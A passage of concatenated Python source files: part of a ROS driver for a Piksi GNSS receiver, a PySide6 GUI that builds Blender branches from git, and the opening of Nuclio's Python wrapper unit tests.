self.publishers['enu_pose_fix'], self.publishers['enu_point_fix'],
self.publishers['enu_transform_fix'], self.publishers['best_fix'],
self.publishers['enu_pose_best_fix'])
def publish_wgs84_point(self, latitude, longitude, height, variance, navsat_status, pub_navsatfix, pub_pose,
pub_point, pub_transform, pub_navsatfix_best_pose, pub_pose_best_fix):
# Navsatfix message.
navsatfix_msg = NavSatFix()
navsatfix_msg.header.stamp = rospy.Time.now()
navsatfix_msg.header.frame_id = self.navsatfix_frame_id
navsatfix_msg.position_covariance_type = NavSatFix.COVARIANCE_TYPE_APPROXIMATED
navsatfix_msg.status.service = NavSatStatus.SERVICE_GPS
navsatfix_msg.latitude = latitude
navsatfix_msg.longitude = longitude
navsatfix_msg.altitude = height
navsatfix_msg.status.status = navsat_status
navsatfix_msg.position_covariance = [variance[0], 0, 0,
0, variance[1], 0,
0, 0, variance[2]]
# Local Enu coordinate.
(east, north, up) = self.geodetic_to_enu(latitude, longitude, height)
# Pose message.
pose_msg = PoseWithCovarianceStamped()
pose_msg.header.stamp = navsatfix_msg.header.stamp
pose_msg.header.frame_id = self.enu_frame_id
pose_msg.pose = self.enu_to_pose_msg(east, north, up, variance)
# Point message.
point_msg = PointStamped()
point_msg.header.stamp = navsatfix_msg.header.stamp
point_msg.header.frame_id = self.enu_frame_id
point_msg.point = self.enu_to_point_msg(east, north, up)
# Transform message.
transform_msg = TransformStamped()
transform_msg.header.stamp = navsatfix_msg.header.stamp
transform_msg.header.frame_id = self.enu_frame_id
transform_msg.child_frame_id = self.transform_child_frame_id
transform_msg.transform = self.enu_to_transform_msg(east, north, up)
# Publish.
pub_navsatfix.publish(navsatfix_msg)
pub_pose.publish(pose_msg)
pub_point.publish(point_msg)
pub_transform.publish(transform_msg)
pub_navsatfix_best_pose.publish(navsatfix_msg)
pub_pose_best_fix.publish(pose_msg)
def cb_sbp_heartbeat(self, msg_raw, **metadata):
msg = MsgHeartbeat(msg_raw)
# Let watchdag know messages are still arriving
self.watchdog_time = rospy.get_rostime()
# Start watchdog with 10 second timeout to ensure we keep getting gps
if not self.messages_started:
self.messages_started = True
rospy.Timer(rospy.Duration(10), self.cb_watchdog)
heartbeat_msg = Heartbeat()
heartbeat_msg.header.stamp = rospy.Time.now()
heartbeat_msg.system_error = msg.flags & 0x01
heartbeat_msg.io_error = msg.flags & 0x02
heartbeat_msg.swift_nap_error = msg.flags & 0x04
heartbeat_msg.sbp_minor_version = (msg.flags & 0xFF00) >> 8
heartbeat_msg.sbp_major_version = (msg.flags & 0xFF0000) >> 16
heartbeat_msg.external_antenna_present = (msg.flags & 0x80000000) >> 31
self.publishers['heartbeat'].publish(heartbeat_msg)
# Update debug msg and publish.
self.receiver_state_msg.system_error = heartbeat_msg.system_error
self.receiver_state_msg.io_error = heartbeat_msg.io_error
self.receiver_state_msg.swift_nap_error = heartbeat_msg.swift_nap_error
self.receiver_state_msg.external_antenna_present = heartbeat_msg.external_antenna_present
self.publish_receiver_state_msg()
if self.base_station_mode:
self.multicaster.sendSbpPacket(msg_raw)
def cb_sbp_measurement_state(self, msg_raw, **metadata):
msg = MsgMeasurementState(msg_raw)
measurement_state_msg = piksi_rtk_msgs.msg.MeasurementState_V2_4_1()
measurement_state_msg.header.stamp = rospy.Time.now()
measurement_state_msg.sat = []
measurement_state_msg.code = []
measurement_state_msg.cn0 = []
# Temporary variables for receiver state message.
num_gps_sat = 0
cn0_gps = []
num_sbas_sat = 0
cn0_sbas = []
num_glonass_sat = 0
cn0_glonass = []
num_bds_sat = 0
cn0_bds = []
num_gal_sat = 0
cn0_gal = []
for single_measurement_state in msg.states:
# Use satellites with valid cn0.
if single_measurement_state.cn0 > 0.0:
measurement_state_msg.sat.append(single_measurement_state.mesid.sat)
measurement_state_msg.code.append(single_measurement_state.mesid.code)
measurement_state_msg.cn0.append(single_measurement_state.cn0)
# Receiver state fields.
code = single_measurement_state.mesid.code
if code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_GPS_L1CA or \
code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_GPS_L2CM or \
code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_GPS_L1P or \
code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_GPS_L2P:
num_gps_sat += 1
cn0_gps.append(single_measurement_state.cn0)
elif code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_SBAS_L1CA:
num_sbas_sat += 1
cn0_sbas.append(single_measurement_state.cn0)
elif code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_GLO_L1CA or \
code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_GLO_L2CA:
num_glonass_sat += 1
cn0_glonass.append(single_measurement_state.cn0)
elif code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_BDS2_B1 or \
code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_BDS2_B2:
num_bds_sat += 1
cn0_bds.append(single_measurement_state.cn0)
elif code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_GAL_E1B or \
code == piksi_rtk_msgs.msg.MeasurementState_V2_4_1.CODE_GAL_E7I:
num_gal_sat += 1
cn0_gal.append(single_measurement_state.cn0)
else:
rospy.logwarn("[cb_sbp_measurement_state]: Unknown satellite code %d.", code)
# Publish if there's at least one element in each array.
if len(measurement_state_msg.sat) \
and len(measurement_state_msg.code) \
and len(measurement_state_msg.cn0):
self.publishers['measurement_state'].publish(measurement_state_msg)
# Update debug msg and publish.
self.receiver_state_msg.num_sat = num_gps_sat + num_sbas_sat + num_glonass_sat + num_bds_sat + num_gal_sat
self.receiver_state_msg.sat = measurement_state_msg.sat
self.receiver_state_msg.cn0 = measurement_state_msg.cn0
self.receiver_state_msg.num_gps_sat = num_gps_sat
self.receiver_state_msg.cn0_gps = cn0_gps
self.receiver_state_msg.num_sbas_sat = num_sbas_sat
self.receiver_state_msg.cn0_sbas = cn0_sbas
self.receiver_state_msg.num_glonass_sat = num_glonass_sat
self.receiver_state_msg.cn0_glonass = cn0_glonass
self.receiver_state_msg.num_bds_sat = num_bds_sat
self.receiver_state_msg.cn0_bds = cn0_bds
self.receiver_state_msg.num_gal_sat = num_gal_sat
self.receiver_state_msg.cn0_gal = cn0_gal
self.publish_receiver_state_msg()
def publish_receiver_state_msg(self):
self.receiver_state_msg.header.stamp = rospy.Time.now()
self.publishers['receiver_state'].publish(self.receiver_state_msg)
def init_geodetic_reference(self, latitude, longitude, altitude):
if self.origin_enu_set:
return
self.latitude0 = math.radians(latitude)
self.longitude0 = math.radians(longitude)
self.altitude0 = altitude
(self.initial_ecef_x, self.initial_ecef_y, self.initial_ecef_z) = self.geodetic_to_ecef(latitude, longitude,
altitude)
# Compute ECEF to NED.
phiP = math.atan2(self.initial_ecef_z,
math.sqrt(math.pow(self.initial_ecef_x, 2) + math.pow(self.initial_ecef_y, 2)))
self.ecef_to_ned_matrix = self.n_re(phiP, self.longitude0)
self.origin_enu_set = True
rospy.loginfo("Origin ENU frame set to: %.6f, %.6f, %.2f" % (latitude, longitude, altitude))
def geodetic_to_ecef(self, latitude, longitude, altitude):
# Convert geodetic coordinates to ECEF.
# http://code.google.com/p/pysatel/source/browse/trunk/coord.py?r=22
lat_rad = math.radians(latitude)
lon_rad = math.radians(longitude)
xi = math.sqrt(1 - PiksiMulti.kFirstEccentricitySquared * math.sin(lat_rad) * math.sin(lat_rad))
x = (PiksiMulti.kSemimajorAxis / xi + altitude) * math.cos(lat_rad) * math.cos(lon_rad)
y = (PiksiMulti.kSemimajorAxis / xi + altitude) * math.cos(lat_rad) * math.sin(lon_rad)
z = (PiksiMulti.kSemimajorAxis / xi * (1 - PiksiMulti.kFirstEccentricitySquared) + altitude) * math.sin(lat_rad)
return x, y, z
def ecef_to_ned(self, x, y, z):
# Converts ECEF coordinate position into local-tangent-plane NED.
# Coordinates relative to given ECEF coordinate frame.
vect = np.array([0.0, 0.0, 0.0])
vect[0] = x - self.initial_ecef_x
vect[1] = y - self.initial_ecef_y
vect[2] = z - self.initial_ecef_z
ret = self.ecef_to_ned_matrix.dot(vect)
n = ret[0]
e = ret[1]
d = -ret[2]
return n, e, d
def geodetic_to_enu(self, latitude, longitude, altitude):
# Geodetic position to local ENU frame
(x, y, z) = self.geodetic_to_ecef(latitude, longitude, altitude)
(north, east, down) = self.ecef_to_ned(x, y, z)
# Return East, North, Up coordinate.
return east, north, -down
def n_re(self, lat_radians, lon_radians):
s_lat = math.sin(lat_radians)
s_lon = math.sin(lon_radians)
c_lat = math.cos(lat_radians)
c_lon = math.cos(lon_radians)
ret = np.eye(3)
ret[0, 0] = -s_lat * c_lon
ret[0, 1] = -s_lat * s_lon
ret[0, 2] = c_lat
ret[1, 0] = -s_lon
ret[1, 1] = c_lon
ret[1, 2] = 0.0
ret[2, 0] = c_lat * c_lon
ret[2, 1] = c_lat * s_lon
ret[2, 2] = s_lat
return ret
def enu_to_pose_msg(self, east, north, up, variance):
pose_msg = PoseWithCovariance()
# Fill covariance using variance parameter of GPS.
pose_msg.covariance[6 * 0 + 0] = variance[0]
pose_msg.covariance[6 * 1 + 1] = variance[1]
pose_msg.covariance[6 * 2 + 2] = variance[2]
# Fill pose section.
pose_msg.pose.position.x = east
pose_msg.pose.position.y = north
pose_msg.pose.position.z = up
# GPS points do not have orientation
pose_msg.pose.orientation.x = 0.0
pose_msg.pose.orientation.y = 0.0
pose_msg.pose.orientation.z = 0.0
pose_msg.pose.orientation.w = 1.0
return pose_msg
def enu_to_point_msg(self, east, north, up):
point_msg = Point()
# Fill pose section.
point_msg.x = east
point_msg.y = north
point_msg.z = up
return point_msg
def enu_to_transform_msg(self, east, north, up):
transform_msg = Transform()
# Fill message.
transform_msg.translation.x = east
transform_msg.translation.y = north
transform_msg.translation.z = up
# Set orientation to unit quaternion as it does not really metter.
transform_msg.rotation.x = 0.0
transform_msg.rotation.y = 0.0
transform_msg.rotation.z = 0.0
transform_msg.rotation.w = 1.0
return transform_msg
def reset_piksi_service_callback(self, request):
response = std_srvs.srv.SetBoolResponse()
if request.data:
# Send reset message.
reset_sbp = SBP(SBP_MSG_RESET)
reset_sbp.payload = ''
reset_msg = reset_sbp.pack()
self.driver.write(reset_msg)
rospy.logwarn("Swift receiver hard reset via rosservice call.")
# Init messages with "memory".
self.receiver_state_msg = self.init_receiver_state_msg()
self.num_wifi_corrections = self.init_num_corrections_msg()
response.success = True
response.message = "Swift receiver reset command sent."
else:
response.success = False
response.message = "Swift receiver reset command not sent."
return response
def settings_write_server(self, request):
response = SettingsWriteResponse()
self.settings_write(request.section_setting, request.setting, request.value)
response.success = True
response.message = "Settings written. Please use service 'settings_read_req' if you want to double check."
return response
def settings_read_req_server(self, request):
response = SettingsReadReqResponse()
# Make sure we do not have any old setting in memory.
self.clear_last_setting_read()
self.settings_read_req(request.section_setting, request.setting)
response.success = True
response.message = "Read-request sent. Please use 'settings_read_resp' to get the response."
return response
def settings_read_resp_server(self, request):
response = SettingsReadRespResponse()
if self.last_section_setting_read and self.last_setting_read and self.last_value_read:
response.success = True
response.message = ""
response.section_setting = self.last_section_setting_read
response.setting = self.last_setting_read
response.value = self.last_value_read
else:
response.success = False
response.message = "Please trigger a new 'settings_read_req' via service call."
response.section_setting = []
response.setting = []
response.value = []
self.clear_last_setting_read()
return response
def settings_save_callback(self, request):
response = std_srvs.srv.SetBoolResponse()
if request.data:
self.settings_save()
response.success = True
response.message = "Swift receiver settings have been saved to flash."
else:
response.success = False
response.message = "Please pass 'true' to this service call to explicitly save to flash the local settings."
return response
def get_installed_sbp_version(self):
command = ["pip", "show", "sbp"]
pip_show_output = subprocess.Popen(command, stdout=subprocess.PIPE)
out, error = pip_show_output.communicate()
# Search for version number, output assumed in the form "Version: X.X.X"
version_output = re.search("Version: \d+.\d+.\d+", out)
if version_output is None:
# No version found
rospy.logfatal("No SBP library found. Please install it by using script in 'install' folder.")
rospy.signal_shutdown("No SBP library found. Please install it by using script in 'install' folder.")
return -1
else:
# extract version number
version_output_string = version_output.group()
version_number = re.search("\d+.\d+.\d+", version_output_string)
return version_number.group()
def settings_write(self, section_setting, setting, value):
"""
Write the defined configuration to Swift receiver.
"""
setting_string = '%s\0%s\0%s\0' % (section_setting, setting, value)
write_msg = MsgSettingsWrite(setting=setting_string)
self.framer(write_msg)
def settings_save(self):
"""
Save settings message persists the device's current settings
configuration to its on-board flash memory file system.
"""
save_msg = MsgSettingsSave()
self.framer(save_msg)
def settings_read_req(self, section_setting, setting):
"""
Request a configuration value to Swift receiver.
"""
setting_string = '%s\0%s\0' % (section_setting, setting)
read_req_msg = MsgSettingsReadReq(setting=setting_string)
self.framer(read_req_msg)
def cb_settings_read_resp(self, msg_raw, **metadata):
"""
Response to a settings_read_req.
"""
msg = MsgSettingsReadResp(msg_raw)
setting_string = msg.setting.split('\0')
self.last_section_setting_read = setting_string[0]
self.last_setting_read = setting_string[1]
self.last_value_read = setting_string[2]
def settings_read_by_index_req(self, index):
"""
Request a configuration value to Swift receiver by parameter index number.
"""
read_req_by_index_msg = MsgSettingsReadByIndexReq(index=index)
self.framer(read_req_by_index_msg)
def cb_sbp_settings_read_by_index_resp(self, msg_raw, **metadata):
"""
Response to a settings_read_by_index_req.
"""
msg = MsgSettingsReadByIndexResp(msg_raw)
setting_string = msg.setting.split('\0')
self.last_section_setting_read = setting_string[0]
self.last_setting_read = setting_string[1]
self.last_value_read = setting_string[2]
def clear_last_setting_read(self):
self.last_section_setting_read = []
self.last_setting_read = []
self.last_value_read = []
|
main.py
|
import threading
import ctypes
import subprocess
import os
import sys
import platform
from PySide6.QtWidgets import (QMainWindow, QApplication, QLabel, QPushButton, QComboBox, QVBoxLayout, QHBoxLayout, QWidget)
from PySide6.QtCore import Slot, Qt, QFile, QTextStream
from PySide6.QtGui import QPixmap, QIcon, QAction
from utils.preferences import *
from shutil import rmtree
class BlenderUpdater(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.title = "Blender Updater"
self.base_path, self.branches_path, self.lib_path = self.loadConfig()
self.base_path += "/"
self.os = platform.system()
self.initUI()
self.comboChanged()
def initUI(self):
self.setWindowTitle(self.title)
git_command = subprocess.run(["git", "-C", self.base_path, "branch", "-a", "--sort=-committerdate"], stdout=subprocess.PIPE)
raw_data = str(git_command).split("->")[1].split()
filtered_data = []
main_widget = QWidget()
self.open_log_action = QAction("Open build log", self)
self.open_log_action.triggered.connect(self.openBuildLog)
self.clean_up_action = QAction("Clean up", self)
self.clean_up_action.triggered.connect(self.startCleanupThread)
self.remove_branch_action = QAction("Remove branch", self)
self.remove_branch_action.triggered.connect(self.removeBranch)
menu_bar = self.menuBar()
file_menu = menu_bar.addMenu("File")
file_menu.addAction(self.open_log_action)
file_menu.addAction(self.clean_up_action)
file_menu.addAction(self.remove_branch_action)
title_label = QLabel("Blender Updater")
title_label.setAlignment(Qt.AlignCenter)
pixmap = QPixmap("./assets/gear.png")
icon = QIcon(pixmap)
self.parameters_button = QPushButton()
self.parameters_button.setFixedWidth(25)
self.parameters_button.setIcon(icon)
self.parameters_button.setIconSize(pixmap.rect().size())
self.parameters_button.clicked.connect(self.preferencesCommand)
self.branches_combo = QComboBox(self)
for data in raw_data:
branch_name = data.split("/")[-1].split("\\n")[0]
if branch_name not in filtered_data:
filtered_data.append(branch_name)
self.branches_combo.addItem(branch_name)
self.branches_combo.currentTextChanged.connect(self.comboChanged)
self.submit_button = QPushButton("Build selected branch")
self.submit_button.clicked.connect(self.startBuildThread)
self.progress_label = QLabel("")
self.abort_button = QPushButton("Abort current build")
self.abort_button.clicked.connect(self.abortBuild)
self.abort_button.setEnabled(False)
self.start_branch_button = QPushButton("Start selected build")
self.start_branch_button.clicked.connect(self.startBuild)
self.start_branch_button.setEnabled(False)
self.horizon_layout = QHBoxLayout()
self.horizon_layout.addWidget(title_label)
self.horizon_layout.addWidget(self.parameters_button)
self.vert_layout = QVBoxLayout()
self.vert_layout.addLayout(self.horizon_layout)
self.vert_layout.addWidget(self.branches_combo)
self.vert_layout.addWidget(self.submit_button)
self.vert_layout.addWidget(self.progress_label)
self.vert_layout.addWidget(self.abort_button)
self.vert_layout.addWidget(self.start_branch_button)
main_widget.setLayout(self.vert_layout)
self.setCentralWidget(main_widget)
def buildBlender(self, stop_event):
self.submit_button.setEnabled(False)
self.start_branch_button.setEnabled(False)
self.abort_button.setEnabled(True)
parameters = self.getUpdateScriptParameters(self.branches_combo.currentText())
with subprocess.Popen(parameters, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, preexec_fn=self.getPreexecCallback()) as proc:
self.child_process = proc
text = ""
loop = 0
while proc.poll() is None:
output = proc.stdout.readline()
output_string = output.strip().decode("utf-8")
if output_string:
progress = True
if output_string == "CHECKOUT":
text = "(1/4) - Checkout"
self.title = "(1/4) - Blender Updater"
elif output_string == "UPDATE":
text = "(2/4) - Update"
self.title = "(2/4) - Blender Updater"
elif output_string == "BUILD":
text = "(3/4) - Build"
self.title = "(3/4) - Blender Updater"
elif output_string == "Error during build":
progress = False
text = "Error during build"
self.title = "Blender Updater"
if progress:
dots = int(loop % 4)
dots_text = ""
for i in range(dots):
dots_text += "."
self.progress_label.setText(text + dots_text)
self.setWindowTitle(self.title)
print(output_string)
loop += 1
self.progress_label.setText("(4/4) - Done")
self.title = "Blender Updater"
self.abort_button.setEnabled(False)
self.start_branch_button.setEnabled(True)
self.submit_button.setEnabled(True)
self.setWindowTitle(self.title)
if self.os == "Windows":
for i in range(5):
ctypes.windll.user32.FlashWindow(ctypes.windll.kernel32.GetConsoleWindow(), True)
self.cancelThread()
def cleanupBlender(self, stop_event):
parameters = self.getCleanupScriptParameters()
with subprocess.Popen(parameters, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, preexec_fn=self.getPreexecCallback()) as proc:
while proc.poll() is None:
output = proc.stdout.readline()
output_string = output.strip().decode("utf-8")
print(output_string)
self.cancelThread()
def getUpdateScriptParameters(self, branch_name):
if self.os == "Windows":
return [os.path.dirname(__file__) + "/utils/update.bat", branch_name, self.base_path]
else:
return ["sh", "./utils/update.sh", branch_name, self.base_path, self.branches_path]
def getCleanupScriptParameters(self):
if self.os == "Windows":
return [os.path.dirname(__file__) + "/utils/cleanup.bat", self.lib_path, self.base_path]
else:
return None
def getPreexecCallback(self):
if self.os == "Windows":
return None
else:
return os.setsid
def getBranchName(self):
'''
Get the branch name to be used in update.sh and linux build paths; assume "master" if nothing is selected
'''
selected_branch = self.branches_combo.currentText()
return selected_branch if selected_branch else "master"
def getBuildPath(self):
if self.os == "Windows":
return self.branches_path + "/" + self.branches_combo.currentText() + "_branch/bin/Release/blender.exe"
else:
return os.path.join(self.branches_path, self.getBranchName(), "bin/blender")
def getBuildLogPath(self):
if self.os == "Windows":
return self.branches_path + "/" + self.branches_combo.currentText() + "_branch/Build.log"
else:
return ""
def abortBuild(self):
if self.child_process:
self.child_process.terminate()
self.stop_event.set()
self.abort_button.setEnabled(False)
self.start_branch_button.setEnabled(True)
self.submit_button.setEnabled(True)
self.progress_label.setText("Aborted")
self.title = "Blender Updater"
self.setWindowTitle(self.title)
def startBuildThread(self):
if os.path.isfile("./utils/preferences.conf"):
self.stop_event = threading.Event()
self.c_thread = threading.Thread(target=self.buildBlender, args=(self.stop_event, ))
self.c_thread.start()
else:
self.preferencesCommand()
def startCleanupThread(self):
if os.path.isfile("./utils/preferences.conf"):
self.stop_event = threading.Event()
self.c_thread = threading.Thread(target=self.cleanupBlender, args=(self.stop_event, ))
self.c_thread.start()
else:
self.preferencesCommand()
def comboChanged(self):
#path = self.branches_path + "/" + self.branches_combo.currentText() + "_branch/bin/Release/blender.exe"
if os.path.exists(self.getBuildPath()):
self.start_branch_button.setEnabled(True)
else:
self.start_branch_button.setEnabled(False)
def preferencesCommand(self):
dialog = BlenderUpdaterPreferences(self)
dialog.exec()
def startBuild(self):
path = self.getBuildPath()
print("START : " + path)
subprocess.Popen([path])
def cancelThread(self):
self.stop_event.set()
def loadConfig(self):
if not os.path.isfile("./utils/preferences.conf"):
self.preferencesCommand()
with open("./utils/preferences.conf", "r") as f:
lines = f.readlines()
try:
return lines[0].strip("\n"), lines[1].strip("\n"), lines[2].strip("\n")
except IndexError: # User messed with conf file
pass
return "", "", ""
def openBuildLog(self):
if os.path.isfile(self.getBuildLogPath()):
os.startfile(self.getBuildLogPath())
def removeBranch(self):
selected_branch = self.branches_combo.currentText()
if selected_branch:
branch_path = f"{self.branches_path}/{selected_branch}_branch"
if os.path.isdir(branch_path):
print(f"REMOVING : {branch_path}")
rmtree(branch_path)
def main():
app = QApplication(sys.argv)
file = QFile("./assets/dark.qss")
file.open(QFile.ReadOnly | QFile.Text)
stream = QTextStream(file)
app.setStyleSheet(stream.readAll())
widget = BlenderUpdater()
widget.resize(300, 200)
widget.show()
sys.exit(app.exec())
if __name__ == "__main__":
main()
|
test_wrapper.py
|
# Copyright 2017 The Nuclio Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import functools
import http.client
import json
import logging
import operator
import os
import socket
import socketserver
import struct
import sys
import tempfile
import threading
import time
import unittest.mock
import msgpack
import nuclio_sdk
import nuclio_sdk.helpers
import _nuclio_wrapper as wrapper
class TestSubmitEvents(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._decode_event_strings = False
def setUp(self):
self._loop = asyncio.get_event_loop()
self._loop.set_debug(True)
self._temp_path = tempfile.mkdtemp(prefix='nuclio-test-py-wrapper')
# write handler to temp path
self._handler_path = self._write_handler(self._temp_path)
# set PYTHONPATH to include temp path
sys.path.append(self._temp_path)
# generate socket path
self._socket_path = os.path.join(self._temp_path, 'nuclio.sock')
# create transport
self._unix_stream_server = self._create_unix_stream_server(self._socket_path)
# create logger
self._logger = nuclio_sdk.Logger(logging.DEBUG)
self._logger.set_handler('test-default', sys.stdout, nuclio_sdk.logger.HumanReadableFormatter())
self._platform_kind = 'test'
self._default_test_handler = 'reverser:handler'
# create a wrapper
self._wrapper = wrapper.Wrapper(self._logger,
self._loop,
self._default_test_handler,
self._socket_path,
self._platform_kind,
decode_event_strings=self._decode_event_strings)
self._loop.run_until_complete(self._wrapper.initialize())
def tearDown(self):
sys.path.remove(self._temp_path)
self._wrapper._processor_sock.close()
self._unix_stream_server.server_close()
self._unix_stream_server.shutdown()
self._unix_stream_server_thread.join()
def test_async_handler(self):
"""Test function decorated with async and running an event loop"""
recorded_events = []
async def event_recorder(context, event):
async def append_event(_event):
context.logger.debug_with('sleeping', event=repr(_event.id))
await asyncio.sleep(0)
context.logger.debug_with('appending event', event=repr(_event.id))
recorded_events.append(_event)
await asyncio.sleep(0)
# using `ensure_future` to BC with python:3.6 (on >= 3.7, you will see "create_task")
# https://docs.python.org/3/library/asyncio-task.html#asyncio.create_task
asyncio.ensure_future(append_event(event), loop=self._loop)
return 'ok'
num_of_events = 10
events = (
nuclio_sdk.Event(_id=i, body='e{}'.format(i))
for i in range(num_of_events)
)
self._send_events(events)
self._wrapper._is_entrypoint_coroutine = True
self._wrapper._entrypoint = event_recorder
self._wrapper._processor_sock.setblocking(False)
self._loop.run_until_complete(self._wrapper.serve_requests(num_of_events))
self._loop.run_until_complete(self._loop.shutdown_asyncgens())
self.assertEqual(num_of_events, len(recorded_events), 'wrong number of events')
# we expect the event to be ordered since though the function is "asynchronous", it is blocked
# by the processor until it gets response.
for recorded_event_index, recorded_event in enumerate(sorted(recorded_events, key=operator.attrgetter('id'))):
self.assertEqual(recorded_event_index, recorded_event.id)
self.assertEqual('e{}'.format(recorded_event_index), self._ensure_str(recorded_event.body))
def test_non_utf8_headers(self):
"""
This test validates the expected behavior for a non-utf8 event field contents
It sends 3 events, whereas the middle one has non-utf8 contents.
Should allow non-utf8 when NOT decoding utf8 and throw exception when trying to decode it
:return:
"""
self._wait_for_socket_creation()
self._wrapper._entrypoint = lambda context, event: self._ensure_str(event.body)
events = [
json.loads(nuclio_sdk.Event(_id=str(i), body='e{0}'.format(i)).to_json())
for i in range(3)
]
# middle event is malformed
malformed_event_index = len(events) // 2
events[malformed_event_index]['headers']['x-nuclio'] = b'\xda'
# send events
t = threading.Thread(target=self._send_events, args=(events,))
t.start()
asyncio.get_event_loop().run_until_complete(self._wrapper.serve_requests(num_requests=len(events)))
t.join()
# processor start
# duration
# function response
# malformed log line (wrapper)
# malformed response
# duration
# function response
expected_messages = 7
self._wait_until_received_messages(expected_messages)
malformed_response = self._unix_stream_server._messages[-3]['body']
if self._decode_event_strings:
# msgpack would fail decoding a non utf8 string when deserializing the event
self.assertEqual(http.client.INTERNAL_SERVER_ERROR, malformed_response['status_code'])
else:
self.assertEqual(http.client.OK, malformed_response['status_code'])
self.assertEqual(events[malformed_event_index]['body'], malformed_response['body'])
# ensure messages coming after malformed request are still valid
last_function_response = self._unix_stream_server._messages[-1]['body']
self.assertEqual(http.client.OK, last_function_response['status_code'])
self.assertEqual(events[-1]['body'], last_function_response['body'])
def test_bad_function_code(self):
def raise_exception(ctx, event):
raise RuntimeError(error_message)
error_message = 'Im a bad entrypoint'
self._wait_for_socket_creation()
self._send_event(nuclio_sdk.Event(_id='1'))
self._wrapper._entrypoint = raise_exception
asyncio.get_event_loop().run_until_complete(self._wrapper.serve_requests(num_requests=1))
# processor start, function log line, response body
self._wait_until_received_messages(3)
# extract the response
response = next(message['body']
for message in self._unix_stream_server._messages
if message['type'] == 'r')
response_body = response['body']
self.assertIn(error_message, response_body)
def test_event_illegal_message_size(self):
def _send_illegal_message_size():
self._unix_stream_server._connection_socket.sendall(struct.pack(">I", 0))
self._wait_for_socket_creation()
t = threading.Thread(target=_send_illegal_message_size)
t.start()
self._wrapper._entrypoint = unittest.mock.MagicMock()
self._wrapper._entrypoint.assert_not_called()
with self.assertRaises(SystemExit):
asyncio.get_event_loop().run_until_complete(self._wrapper.serve_requests(num_requests=1))
t.join()
def test_single_event(self):
reverse_text = 'reverse this'
# send the event
self._wait_for_socket_creation()
t = threading.Thread(target=self._send_event, args=(nuclio_sdk.Event(_id=1, body=reverse_text),))
t.start()
asyncio.get_event_loop().run_until_complete(self._wrapper.serve_requests(num_requests=1))
t.join()
# processor start, function log line, response body, duration messages
self._wait_until_received_messages(4)
# extract the response
response = next(message['body']
for message in self._unix_stream_server._messages
if message['type'] == 'r')
response_body = response['body'][::-1]
self.assertEqual(reverse_text, response_body)
def test_blast_events(self):
"""Test when many >> 10 events are being sent in parallel"""
def record_event(recorded_events, ctx, event):
recorded_events.add(event.id)
recorded_event_ids = set()
expected_events_length = 10000
events = (
nuclio_sdk.Event(_id=i, body='e{}'.format(i))
for i in range(expected_events_length)
)
t = threading.Thread(target=self._send_events, args=(events,))
t.start()
self._wrapper._entrypoint = functools.partial(record_event, recorded_event_ids)
asyncio.get_event_loop().run_until_complete(self._wrapper.serve_requests(num_requests=expected_events_length))
t.join()
# record incoming events
self.assertEqual(expected_events_length, len(recorded_event_ids), 'Wrong number of events')
def test_multi_event(self):
"""Test when two events fit inside on TCP packet"""
recorded_events = []
def event_recorder(ctx, event):
recorded_events.append(event)
return 'OK'
num_of_events = 10
events = (
nuclio_sdk.Event(_id=i, body='e{}'.format(i))
for i in range(num_of_events)
)
self._send_events(events)
self._wrapper._entrypoint = event_recorder
asyncio.get_event_loop().run_until_complete(self._wrapper.serve_requests(num_of_events))
self.assertEqual(num_of_events, len(recorded_events), 'wrong number of events')
for recorded_event_index, recorded_event in enumerate(sorted(recorded_events, key=operator.attrgetter('id'))):
self.assertEqual(recorded_event_index, recorded_event.id)
self.assertEqual('e{}'.format(recorded_event_index), self._ensure_str(recorded_event.body))
# to run memory profiling test, uncomment the tests below
# and from terminal run with
# > mprof run python -m py.test test_wrapper.py::TestSubmitEvents::test_memory_profiling_<num> --full-trace
# and to get its plot use:
# > mprof plot --backend agg --output <filename>.png
# def test_memory_profiling_100(self):
# self._run_memory_profiling(100)
#
# def test_memory_profiling_1k(self):
# self._run_memory_profiling(1000)
#
# def test_memory_profiling_10k(self):
# self._run_memory_profiling(10000)
#
# def test_memory_profiling_100k(self):
# self._run_memory_profiling(100000)
#
# def _run_memory_profiling(self, num_of_events):
# import memory_profiler
# self._wait_for_socket_creation()
# self._wrapper._entrypoint = unittest.mock.MagicMock()
# self._wrapper._entrypoint.return_value = {}
# events = (
# json.loads(nuclio_sdk.Event(_id=str(i), body='e{0}'.format(i)).to_json())
# for i in range(num_of_events)
# )
# threading.Thread(target=self._send_events, args=(events,)).start()
# with open('test_memory_profiling_{0}.txt'.format(num_of_events), 'w') as f:
# profiled_serve_requests_func = memory_profiler.profile(self._wrapper.serve_requests,
# precision=4,
# stream=f)
# profiled_serve_requests_func(num_requests=num_of_events)
# self.assertEqual(num_of_events, self._wrapper._entrypoint.call_count, 'Received unexpected number of events')
def _send_events(self, events):
self._wait_for_socket_creation()
for event in events:
self._send_event(event)
def _send_event(self, event):
if not isinstance(event, dict):
event = self._event_to_dict(event)
# event to a msgpack body message
body = msgpack.Packer().pack(event)
# big endian body len
body_len = struct.pack(">I", len(body))
# first write body length
self._unix_stream_server._connection_socket.sendall(body_len)
# then write body content
self._unix_stream_server._connection_socket.sendall(body)
def _get_packed_event_body_len(self, event):
return len(msgpack.Packer().pack(self._event_to_dict(event)))
def _event_to_dict(self, event):
return json.loads(event.to_json())
def _wait_for_socket_creation(self, timeout=10, interval=0.1):
# wait for socket connection
